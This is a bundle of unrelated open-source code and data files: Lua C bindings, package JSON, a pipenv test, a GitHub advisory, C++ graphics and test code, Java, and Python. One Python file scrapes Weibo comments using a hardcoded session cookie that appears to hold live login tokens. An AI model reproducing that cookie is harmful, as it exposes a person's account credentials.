= 0; lua_pushvalue(L, 2); lua_pushnil(L); match_max = 0; while(lua_next(L, -2)) { if(lua_isstring(L, -2)) { if(is_match(lua_tostring(L, -2), uri)) { the_match_pat = pat; } } lua_pop(L, 1); pat++; if(pat >= 100) { break; } } lua_pop(L, 1); pat = 0; lua_pushvalue(L, 2); lua_pushnil(L); while(lua_next(L, -2)) { if(lua_isstring(L, -2)) { if(match_max > 0 && pat == the_match_pat) { lua_pushvalue(L, -1); lua_remove(L, -2); lua_remove(L, -2); lua_remove(L, -2); lua_createtable(L, 0, match_max); int i = 0; for(i = 1; i < match_max; i++) { if(!v_p[i]) { continue; } lua_pushlstring(L, v_p[i], v_p_len[i]); lua_pushstring(L, v_c[i]); free(v_c[i]); v_c[i] = NULL; lua_settable(L, -3); } return 2; } } lua_pop(L, 1); pat++; if(pat >= 100) { break; } } lua_pop(L, 1); return 0; }
5,637
2,362
<reponame>lksnmnn/useWorker<gh_stars>1000+ { "unversionedId": "api-useworker", "id": "api-useworker", "isDocsHomePage": false, "title": "useWorker()", "description": "Import", "source": "@site/docs/useworker.md", "slug": "/api-useworker", "permalink": "/docs/api-useworker", "editUrl": "https://github.com/alewin/useworker/edit/master/website/docs/useworker.md", "version": "current", "sidebar": "someSidebar", "previous": { "title": "Usage", "permalink": "/docs/usage" }, "next": { "title": "WORKER_STATUS", "permalink": "/docs/api-workerstatus" } }
246
346
{ "packagingVersion": "3.0", "name": "redis", "version": "3.2.9-0.0.1", "maintainer": "<EMAIL>", "description": "This is a single redis container, which is suited for HA setups. Redis is a popular in-memory data structure store, used as database, cache and message broker.. See documentation for more details: https://github.com/dcos/examples/tree/master/redis ", "website": "http://www.redis.io", "framework": false, "tags": ["mesosphere", "service", "redis", "storage"], "licenses": [ { "name": "BSD", "url": "http://redis.io/topics/license" } ], "website": "http://redis.io", "postInstallNotes": "Redis installed!", "preInstallNotes": "This DC/OS Service is currently in preview. There may be bugs, incomplete features, incorrect documentation, or other discrepancies. Redis requires a single node with 300MB of RAM and 0.1 CPUs. ", "postUninstallNotes": "Thank you for using Redis", "lastUpdated": 1496284523 }
304
6,263
import itertools import pytest import os from pipenv import environments from pipenv.utils import temp_environ @pytest.mark.environments @pytest.mark.parametrize( "arg, prefix, use_negation", list(itertools.product(("ENABLE_SOMETHING",), ("FAKEPREFIX", None), (True, False))), ) def test_get_from_env(arg, prefix, use_negation): negated_arg = "NO_{0}".format(arg) positive_var = arg negative_var = negated_arg if prefix: negative_var = "{0}_{1}".format(prefix, negative_var) positive_var = "{0}_{1}".format(prefix, positive_var) # set the positive first for var_to_set, opposite_var in ((arg, negated_arg), (negated_arg, arg)): os.environ.pop(var_to_set, None) os.environ.pop(opposite_var, None) with temp_environ(): is_positive = var_to_set == arg is_negative = not is_positive envvar = positive_var if is_positive else negative_var os.environ[envvar] = "true" main_expected_value = True if is_positive else None if use_negation and not is_positive: main_expected_value = False # use negation means if the normal variable isnt set we will check # for the negated version negative_expected_value = ( True if is_negative else None ) if is_positive: assert ( environments.get_from_env( var_to_set, prefix, check_for_negation=use_negation ) is main_expected_value ) assert ( environments.get_from_env( opposite_var, prefix, check_for_negation=use_negation ) is negative_expected_value ) else: # var_to_set = negative version i.e. NO_xxxx # opposite_var = positive_version i.e. XXXX # get NO_BLAH -- expecting this to be True assert ( environments.get_from_env( var_to_set, prefix, check_for_negation=use_negation ) is negative_expected_value ) # get BLAH -- expecting False if checking for negation # but otherwise should be None assert ( environments.get_from_env( opposite_var, prefix, check_for_negation=use_negation ) is main_expected_value )
1,367
892
{ "schema_version": "1.2.0", "id": "GHSA-4f6h-p35h-c9p6", "modified": "2022-05-01T07:41:50Z", "published": "2022-05-01T07:41:50Z", "aliases": [ "CVE-2006-6817" ], "details": "AlstraSoft Web Host Directory allows remote attackers to obtain sensitive information by requesting any invalid URI, which reveals the path in an error message, a different vulnerability than CVE-2006-2617.", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6817" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/455352/100/0/threaded" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
340
1,062
// // Generated by class-dump 3.5b1 (64 bit) (Debug version compiled Dec 3 2019 19:59:57). // // Copyright (C) 1997-2019 <NAME>. // #import <IMAP/IMAPNetworkTaskOperation.h> @class IMAPDownloadCache, NSArray; @protocol IMAPMessageDataSource, IMAPSyncAttachmentsOperationDelegate; @interface IMAPSyncAttachmentsOperation : IMAPNetworkTaskOperation { NSArray *_downloads; // 8 = 0x8 id <IMAPMessageDataSource> _dataSource; // 16 = 0x10 id <IMAPSyncAttachmentsOperationDelegate> _delegate; // 24 = 0x18 IMAPDownloadCache *_downloadCache; // 32 = 0x20 } @property(retain, nonatomic) IMAPDownloadCache *downloadCache; // @synthesize downloadCache=_downloadCache; @property(readonly, nonatomic) __weak id <IMAPSyncAttachmentsOperationDelegate> delegate; // @synthesize delegate=_delegate; @property(readonly, nonatomic) id <IMAPMessageDataSource> dataSource; // @synthesize dataSource=_dataSource; @property(readonly, copy, nonatomic) NSArray *downloads; // @synthesize downloads=_downloads; - (void).cxx_destruct; // IMP=0x000000000005607a - (void)main; // IMP=0x0000000000055510 - (id)description; // IMP=0x0000000000055476 - (id)initWithMailboxName:(id)arg1; // IMP=0x00000000000553a7 - (id)initWithDownloads:(id)arg1 dataSource:(id)arg2 downloadCache:(id)arg3 delegate:(id)arg4; // IMP=0x0000000000055284 @end
472
313
/* * Copyright 2018 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.netflix.titus.common.util.rx; import java.util.ArrayList; import java.util.List; import java.util.concurrent.BlockingQueue; import java.util.concurrent.LinkedBlockingDeque; import java.util.concurrent.atomic.AtomicReference; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import rx.Observable; import rx.Observer; import rx.Scheduler; import rx.functions.Action1; import rx.subjects.AsyncSubject; /** * A computation task invoker with the following properties: * <ul> * <li>Each computation is represented as an {@link Observable} emitting one or more elements, that ultimately completes</li> * <li>Only one computation runs at a time. Only when it completes another one is started.</li> * <li>If a computation is running, and new recompute requests are submitted, they are queued, until the running computation completes</li> * <li>For a backlog of computation requests in the queue, a single computation is performed</li> * </ul> * This invoker is useful if computations mustn't be done in parallel, and its result depends on point in time * (give me result created no later than when the request was submitted). The latter property allows for computation * result sharing across queued requests. */ public class ComputationTaskInvoker<O> { private static final Logger logger = LoggerFactory.getLogger(ComputationTaskInvoker.class); private final Scheduler.Worker worker; private final Observable<O> computation; private final BlockingQueue<Observer<? super O>> waitingObservers = new LinkedBlockingDeque<>(); private final AtomicReference<Observable<Void>> pendingComputation = new AtomicReference<>(); public ComputationTaskInvoker(Observable<O> computation, Scheduler scheduler) { this.worker = scheduler.createWorker(); this.computation = computation; } public Observable<O> recompute() { return Observable.create(subscriber -> { waitingObservers.add(subscriber); worker.schedule(this::drain); }); } private void drain() { if (waitingObservers.isEmpty()) { return; } AsyncSubject<Void> subject = AsyncSubject.create(); Observable<Void> pending = pendingComputation.get(); while (pending == null) { if (pendingComputation.compareAndSet(null, subject)) { pending = subject; } else { pending = pendingComputation.get(); } } if (pending == subject) { List<Observer<? super O>> available = new ArrayList<>(); waitingObservers.drainTo(available); computation .doOnTerminate(() -> { pendingComputation.set(null); subject.onCompleted(); }) .subscribe( next -> doSafely(available, o -> o.onNext(next)), e -> doSafely(available, o -> o.onError(e)), () -> doSafely(available, Observer::onCompleted) ); } else { pending.doOnTerminate(() -> worker.schedule(this::drain)).subscribe(); } } private void doSafely(List<Observer<? super O>> observers, Action1<Observer<? super O>> action) { observers.forEach(o -> { try { action.call(o); } catch (Throwable e) { logger.debug("Observable invocation failure", e); } }); } }
1,593
3,172
<filename>examples/PPO/scaler.py # Third party code # # The following code are copied or modified from: # https://github.com/pat-coady/trpo import numpy as np import scipy.signal __all__ = ['Scaler'] class Scaler(object): """ Generate scale and offset based on running mean and stddev along axis=0 offset = running mean scale = 1 / (stddev + 0.1) / 3 (i.e. 3x stddev = +/- 1.0) """ def __init__(self, obs_dim): """ Args: obs_dim: dimension of axis=1 """ self.vars = np.zeros(obs_dim) self.means = np.zeros(obs_dim) self.cnt = 0 self.first_pass = True def update(self, x): """ Update running mean and variance (this is an exact method) Args: x: NumPy array, shape = (N, obs_dim) see: https://stats.stackexchange.com/questions/43159/how-to-calculate-pooled- variance-of-two-groups-given-known-group-variances-mean """ if self.first_pass: self.means = np.mean(x, axis=0) self.vars = np.var(x, axis=0) self.cnt = x.shape[0] self.first_pass = False else: n = x.shape[0] new_data_var = np.var(x, axis=0) new_data_mean = np.mean(x, axis=0) new_data_mean_sq = np.square(new_data_mean) new_means = ( (self.means * self.cnt) + (new_data_mean * n)) / (self.cnt + n) self.vars = (((self.cnt * (self.vars + np.square(self.means))) + (n * (new_data_var + new_data_mean_sq))) / (self.cnt + n) - np.square(new_means)) self.vars = np.maximum( 0.0, self.vars) # occasionally goes negative, clip self.means = new_means self.cnt += n def get(self): """ returns 2-tuple: (scale, offset) """ return 1 / (np.sqrt(self.vars) + 0.1) / 3, self.means
1,023
710
""" 爬取微博评论,保存到文件中 https://m.weibo.cn/api/comments/show?id=4477013081328252&page=50 该接口能获取微博的前50页数据,每页10条, id 是某条微博的id https://m.weibo.cn/comments/hotflow?mid=4477013081328252&max_id=330569188932643&max_id_type=0 此接口能爬到所有评论信息, mid 是某条微博id, max_id 是上一个请求返回的分页参数, max_id_type 固定为0就好 """ from pymongo import MongoClient import requests import time __author__ = 'liuzhijun' headers = { "Host": "m.weibo.cn", "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) " "Version/9.0 Mobile/13B143 Safari/601.1", "Cookie": "ALF=1585622740; SCF=AkYKPH_4_43DdgVfDGrD7N6PC2DQN3YlA5MS_Wtn7viiEfWYidSCeZUVClv83hcG0e3LaFPJMMOxfGELIzLciEY.; SUB=_2A25zX1GoDeRhGedI4lUW8CzOzz2IHXVQoH_grDV6PUJbktANLUzEkW1NVmpkfU6FYNoJwj2PzeF0Y9AMgJSdjT2J; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9WWbbPzPaDijADNgfIppECPn5JpX5K-hUgL.Fo2c1KMNehzESh22dJLoIEXLxKMLBKnL12zLxK-LB.2L12qLxK-L1K2L1KnLxK-LB.qL1KMLxK-L1hqL1-zt; SUHB=0Ryr1hd10ceFZR; SSOLoginState=1583030776; _T_WM=68502013108; WEIBOCN_FROM=1110006030; MLOGIN=1; XSRF-TOKEN=<PASSWORD>" } client = MongoClient('mongodb://localhost:27017/') db = client['weibo'] def main(mid, max_id): """ :param mid: 某条微博id :param max_id: 分页参数 :return: """ url = "https://m.weibo.cn/comments/hotflow?max_id_type=0" params = {"mid": mid} if max_id: params['max_id'] = max_id res = requests.get(url, params=params, headers=headers) print(res.content) result = res.json() max_id = result.get("data").get("max_id") data = result.get('data').get('data') for item in data: db['comment'].insert_one(item) if max_id: time.sleep(1) main(mid, max_id) if __name__ == '__main__': main("4477013081328252", None)
1,081
2,151
<filename>third_party/blink/renderer/platform/graphics/canvas_metrics.h // Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_CANVAS_METRICS_H_ #define THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_CANVAS_METRICS_H_ #include "third_party/blink/renderer/platform/platform_export.h" #include "third_party/blink/renderer/platform/wtf/allocator.h" namespace blink { class PLATFORM_EXPORT CanvasMetrics { STATIC_ONLY(CanvasMetrics); public: enum CanvasContextUsage { kCanvasCreated = 0, kGPUAccelerated2DCanvasImageBufferCreated = 1, kUnaccelerated2DCanvasImageBufferCreated = 3, kAccelerated2DCanvasGPUContextLost = 4, kUnaccelerated2DCanvasImageBufferCreationFailed = 5, kGPUAccelerated2DCanvasImageBufferCreationFailed = 6, kGPUAccelerated2DCanvasDeferralDisabled = 8, kGPUAccelerated2DCanvasSurfaceCreationFailed = 9, kNumberOfUsages }; static void CountCanvasContextUsage(const CanvasContextUsage); }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_CANVAS_METRICS_H_
460
354
/*------------------------------------------------------------------------- * drawElements Quality Program OpenGL ES 2.0 Module * ------------------------------------------------- * * Copyright 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *//*! * \file * \brief Shader discard statement tests. *//*--------------------------------------------------------------------*/ #include "es2fShaderDiscardTests.hpp" #include "glsShaderRenderCase.hpp" #include "tcuStringTemplate.hpp" #include "gluTexture.hpp" #include <map> #include <sstream> #include <string> #include "glwEnums.hpp" #include "glwFunctions.hpp" using tcu::StringTemplate; using std::map; using std::string; using std::ostringstream; using namespace glu; using namespace deqp::gls; namespace deqp { namespace gles2 { namespace Functional { enum CaseFlags { FLAG_USES_TEXTURES = (1<<0), FLAG_REQUIRES_DYNAMIC_LOOPS = (1<<1), }; class ShaderDiscardCase : public ShaderRenderCase { public: ShaderDiscardCase (Context& context, const char* name, const char* description, const char* shaderSource, ShaderEvalFunc evalFunc, deUint32 flags); virtual ~ShaderDiscardCase (void); void init (void); void deinit (void); void setupUniforms (int programID, const tcu::Vec4& constCoords); private: const deUint32 m_flags; glu::Texture2D* m_brickTexture; }; ShaderDiscardCase::ShaderDiscardCase (Context& context, const char* name, const char* description, const char* shaderSource, ShaderEvalFunc evalFunc, deUint32 flags) : ShaderRenderCase (context.getTestContext(), context.getRenderContext(), context.getContextInfo(), name, description, false, evalFunc) , m_flags (flags) , m_brickTexture (DE_NULL) { m_fragShaderSource = shaderSource; m_vertShaderSource = "attribute highp vec4 a_position;\n" "attribute highp vec4 a_coords;\n" "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n\n" "void main (void)\n" "{\n" " gl_Position = a_position;\n" " v_color = vec4(a_coords.xyz, 1.0);\n" " v_coords = a_coords;\n" "}\n"; } ShaderDiscardCase::~ShaderDiscardCase (void) { delete m_brickTexture; } void ShaderDiscardCase::init (void) { try { gls::ShaderRenderCase::init(); } catch (const CompileFailed&) { if (m_flags & FLAG_REQUIRES_DYNAMIC_LOOPS) { const bool isSupported = m_isVertexCase ? m_ctxInfo.isVertexDynamicLoopSupported() : m_ctxInfo.isFragmentDynamicLoopSupported(); if (!isSupported) throw tcu::NotSupportedError("Dynamic loops not supported"); } throw; } if (m_flags & FLAG_USES_TEXTURES) { m_brickTexture = glu::Texture2D::create(m_renderCtx, m_ctxInfo, m_testCtx.getArchive(), "data/brick.png"); m_textures.push_back(TextureBinding(m_brickTexture, tcu::Sampler(tcu::Sampler::CLAMP_TO_EDGE, tcu::Sampler::CLAMP_TO_EDGE, tcu::Sampler::CLAMP_TO_EDGE, tcu::Sampler::LINEAR, tcu::Sampler::LINEAR))); } } void ShaderDiscardCase::deinit (void) { gls::ShaderRenderCase::deinit(); delete m_brickTexture; m_brickTexture = DE_NULL; } void ShaderDiscardCase::setupUniforms (int programID, const tcu::Vec4&) { const glw::Functions& gl = m_renderCtx.getFunctions(); gl.uniform1i(gl.getUniformLocation(programID, "ut_brick"), 0); } ShaderDiscardTests::ShaderDiscardTests (Context& context) : TestCaseGroup(context, "discard", "Discard statement tests") { } ShaderDiscardTests::~ShaderDiscardTests (void) { } enum DiscardMode { DISCARDMODE_ALWAYS = 0, DISCARDMODE_NEVER, DISCARDMODE_UNIFORM, DISCARDMODE_DYNAMIC, DISCARDMODE_TEXTURE, DISCARDMODE_LAST }; enum DiscardTemplate { DISCARDTEMPLATE_MAIN_BASIC = 0, DISCARDTEMPLATE_FUNCTION_BASIC, DISCARDTEMPLATE_MAIN_STATIC_LOOP, DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP, DISCARDTEMPLATE_FUNCTION_STATIC_LOOP, DISCARDTEMPLATE_LAST }; // Evaluation functions inline void evalDiscardAlways (ShaderEvalContext& c) { c.discard(); } inline void evalDiscardNever (ShaderEvalContext& c) { c.color.xyz() = c.coords.swizzle(0,1,2); } inline void evalDiscardDynamic (ShaderEvalContext& c) { c.color.xyz() = c.coords.swizzle(0,1,2); if (c.coords.x()+c.coords.y() > 0.0f) c.discard(); } inline void evalDiscardTexture (ShaderEvalContext& c) { c.color.xyz() = c.coords.swizzle(0,1,2); if (c.texture2D(0, c.coords.swizzle(0,1) * 0.25f + 0.5f).x() < 0.7f) c.discard(); } static ShaderEvalFunc getEvalFunc (DiscardMode mode) { switch (mode) { case DISCARDMODE_ALWAYS: return evalDiscardAlways; case DISCARDMODE_NEVER: return evalDiscardNever; case DISCARDMODE_UNIFORM: return evalDiscardAlways; case DISCARDMODE_DYNAMIC: return evalDiscardDynamic; case DISCARDMODE_TEXTURE: return evalDiscardTexture; default: DE_ASSERT(DE_FALSE); return evalDiscardAlways; } } static const char* getTemplate (DiscardTemplate variant) { switch (variant) { case DISCARDTEMPLATE_MAIN_BASIC: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " ${DISCARD};\n" "}\n"; case DISCARDTEMPLATE_FUNCTION_BASIC: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void myfunc (void)\n" "{\n" " ${DISCARD};\n" "}\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " myfunc();\n" "}\n"; case DISCARDTEMPLATE_MAIN_STATIC_LOOP: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " for (int i = 0; i < 2; i++)\n" " {\n" " if (i > 0)\n" " ${DISCARD};\n" " }\n" "}\n"; case DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n" "uniform mediump int ui_two;\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " for (int i = 0; i < ui_two; i++)\n" " {\n" " if (i > 0)\n" " ${DISCARD};\n" " }\n" "}\n"; case DISCARDTEMPLATE_FUNCTION_STATIC_LOOP: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void myfunc (void)\n" "{\n" " for (int i = 0; i < 2; i++)\n" " {\n" " if (i > 0)\n" " ${DISCARD};\n" " }\n" "}\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " myfunc();\n" "}\n"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getTemplateName (DiscardTemplate variant) { switch (variant) { case DISCARDTEMPLATE_MAIN_BASIC: return "basic"; case DISCARDTEMPLATE_FUNCTION_BASIC: return "function"; case DISCARDTEMPLATE_MAIN_STATIC_LOOP: return "static_loop"; case DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP: return "dynamic_loop"; case DISCARDTEMPLATE_FUNCTION_STATIC_LOOP: return "function_static_loop"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getModeName (DiscardMode mode) { switch (mode) { case DISCARDMODE_ALWAYS: return "always"; case DISCARDMODE_NEVER: return "never"; case DISCARDMODE_UNIFORM: return "uniform"; case DISCARDMODE_DYNAMIC: return "dynamic"; case DISCARDMODE_TEXTURE: return "texture"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getTemplateDesc (DiscardTemplate variant) { switch (variant) { case DISCARDTEMPLATE_MAIN_BASIC: return "main"; case DISCARDTEMPLATE_FUNCTION_BASIC: return "function"; case DISCARDTEMPLATE_MAIN_STATIC_LOOP: return "static loop"; case DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP: return "dynamic loop"; case DISCARDTEMPLATE_FUNCTION_STATIC_LOOP: return "static loop in function"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getModeDesc (DiscardMode mode) { switch (mode) { case DISCARDMODE_ALWAYS: return "Always discard"; case DISCARDMODE_NEVER: return "Never discard"; case DISCARDMODE_UNIFORM: return "Discard based on uniform value"; case DISCARDMODE_DYNAMIC: return "Discard based on varying values"; case DISCARDMODE_TEXTURE: return "Discard based on texture value"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } ShaderDiscardCase* makeDiscardCase (Context& context, DiscardTemplate tmpl, DiscardMode mode) { StringTemplate shaderTemplate(getTemplate(tmpl)); map<string, string> params; switch (mode) { case DISCARDMODE_ALWAYS: params["DISCARD"] = "discard"; break; case DISCARDMODE_NEVER: params["DISCARD"] = "if (false) discard"; break; case DISCARDMODE_UNIFORM: params["DISCARD"] = "if (ui_one > 0) discard"; break; case DISCARDMODE_DYNAMIC: params["DISCARD"] = "if (v_coords.x+v_coords.y > 0.0) discard"; break; case DISCARDMODE_TEXTURE: params["DISCARD"] = "if (texture2D(ut_brick, v_coords.xy*0.25+0.5).x < 0.7) discard"; break; default: DE_ASSERT(DE_FALSE); break; } string name = string(getTemplateName(tmpl)) + "_" + getModeName(mode); string description = string(getModeDesc(mode)) + " in " + getTemplateDesc(tmpl); deUint32 flags = (mode == DISCARDMODE_TEXTURE ? FLAG_USES_TEXTURES : 0) | (tmpl == DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP ? FLAG_REQUIRES_DYNAMIC_LOOPS : 0); return new ShaderDiscardCase(context, name.c_str(), description.c_str(), shaderTemplate.specialize(params).c_str(), getEvalFunc(mode), flags); } void ShaderDiscardTests::init (void) { for (int tmpl = 0; tmpl < DISCARDTEMPLATE_LAST; tmpl++) for (int mode = 0; mode < DISCARDMODE_LAST; mode++) addChild(makeDiscardCase(m_context, (DiscardTemplate)tmpl, (DiscardMode)mode)); } } // Functional } // gles2 } // deqp
4,850
4,537
<filename>3rdparty/stout/include/stout/os/windows/mktemp.hpp // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #ifndef __STOUT_OS_WINDOWS_MKTEMP_HPP__ #define __STOUT_OS_WINDOWS_MKTEMP_HPP__ #include <string> #include <vector> #include <stout/error.hpp> #include <stout/path.hpp> #include <stout/stringify.hpp> #include <stout/try.hpp> #include <stout/windows.hpp> #include <stout/os/close.hpp> #include <stout/os/int_fd.hpp> #include <stout/os/open.hpp> #include <stout/os/temp.hpp> #include <stout/internal/windows/longpath.hpp> namespace os { // Creates a temporary file using the specified path template. The // template may be any path with _6_ `Xs' appended to it, for example // /tmp/temp.XXXXXX. The trailing `Xs' are replaced with a unique // alphanumeric combination. inline Try<std::string> mktemp( const std::string& path = path::join(os::temp(), "XXXXXX")) { const std::wstring longpath = ::internal::windows::longpath(path); std::vector<wchar_t> buffer(longpath.begin(), longpath.end()); // The range does not include the null terminator, needed to reconstruct // the next string. buffer.push_back(L'\0'); // NOTE: in the POSIX spec, `mkstemp` will generate a random filename from // the `path` template, `open` that filename, and return the resulting file // descriptor. On Windows, `_mktemp_s` will actually only generate the path, // so here we actually have to call `open` ourselves to get a file descriptor // we can return as a result. if (::_wmktemp_s(buffer.data(), buffer.size()) != 0) { return WindowsError(); } const std::string temp_file = stringify(std::wstring(buffer.data())); // NOTE: We open the file with read/write access for the given user, an // attempt to match POSIX's specification of `mkstemp`. We use `_S_IREAD` and // `_S_IWRITE` here instead of the POSIX equivalents. On Windows the file is // is not present, we use `_O_CREAT` option when opening the file. Try<int_fd> fd = os::open(temp_file, O_RDWR | O_CREAT | O_EXCL, _S_IREAD | _S_IWRITE); if (fd.isError()) { return Error(fd.error()); } // We ignore the return value of close(). This is because users // calling this function are interested in the return value of // mkstemp(). Also an unsuccessful close() doesn't affect the file. os::close(fd.get()); return strings::remove(temp_file, os::LONGPATH_PREFIX, strings::Mode::PREFIX); } } // namespace os { #endif // __STOUT_OS_WINDOWS_MKTEMP_HPP__
972
880
/** * Copyright 2019 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ch.qos.logback.core.sift; import ch.qos.logback.core.spi.LifeCycle; /** * Implement this interface in order to compute a discriminating value for a * given event of type &lt;E&gt;. * * <p>The returned value can depend on any data available at the time of the * call, including data contained within the currently running thread. * * @author <NAME>; * * @param <E> */ public interface Discriminator<E> extends LifeCycle { /** * Given event 'e' return a discriminating value. * * @param e event to evaluate * @return discriminating value */ String getDiscriminatingValue(E e); /** * The key or variable name under which the discriminating value should be * exported into the host environment. * * @return key or name */ String getKey(); }
404
580
<filename>test/alignment.cpp // DynaMix // Copyright (c) 2013-2019 <NAME>, <NAME> // // Distributed under the MIT Software License // See accompanying file LICENSE.txt or copy at // https://opensource.org/licenses/MIT // #include <dynamix/core.hpp> #include <dynamix/allocators.hpp> #include "doctest/doctest.h" TEST_SUITE_BEGIN("align"); using namespace dynamix; TEST_CASE("sub_ptr_align") { size_t ptr_size = sizeof(uintptr_t); for(size_t i=1; i<=ptr_size; ++i) { CHECK(2 * ptr_size == domain_allocator::mem_size_for_mixin(i, 1)); } for(size_t i=2; i<=ptr_size; i+=2) { CHECK(2 * ptr_size == domain_allocator::mem_size_for_mixin(i, 2)); } } DYNAMIX_DECLARE_MIXIN(align_default); DYNAMIX_DECLARE_MIXIN(align_8); DYNAMIX_DECLARE_MIXIN(align_16); DYNAMIX_DECLARE_MIXIN(align_32); DYNAMIX_MULTICAST_MESSAGE_0(void, check_alignment); TEST_CASE("aligned_mixin") { object o; mutate(o) .add<align_default>() .add<align_8>() .add<align_16>() .add<align_32>(); CHECK(intptr_t(o.get<align_8>()) % 8 == 0); CHECK(intptr_t(o.get<align_16>()) % 16 == 0); CHECK(intptr_t(o.get<align_32>()) % 32 == 0); check_alignment(o); } TEST_SUITE_END(); class align_default { public: void check_alignment() { CHECK(intptr_t(this) % std::alignment_of<align_default>::value == 0); } }; #if defined _MSC_VER # define ALIGN(n) __declspec(align(n)) #else # define ALIGN(n) __attribute__((aligned(n))) #endif class ALIGN(8) align_8 { public: void check_alignment() { CHECK(intptr_t(this) % 8 == 0); } }; class ALIGN(16) align_16 { public: void check_alignment() { CHECK(intptr_t(this) % 16 == 0); } }; class ALIGN(32) align_32 { public: void check_alignment() { CHECK(intptr_t(this) % 32 == 0); } }; DYNAMIX_DEFINE_MIXIN(align_default, check_alignment_msg); DYNAMIX_DEFINE_MIXIN(align_8, check_alignment_msg); DYNAMIX_DEFINE_MIXIN(align_16, check_alignment_msg); DYNAMIX_DEFINE_MIXIN(align_32, check_alignment_msg); DYNAMIX_DEFINE_MESSAGE(check_alignment);
1,042
319
/* * Copyright (c) 2014, Regents of the University of California * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package edu.uci.python.profiler; import java.io.*; import java.util.*; import java.util.Map.Entry; import com.oracle.truffle.api.*; import com.oracle.truffle.api.nodes.*; import edu.uci.python.nodes.*; import edu.uci.python.nodes.argument.*; import 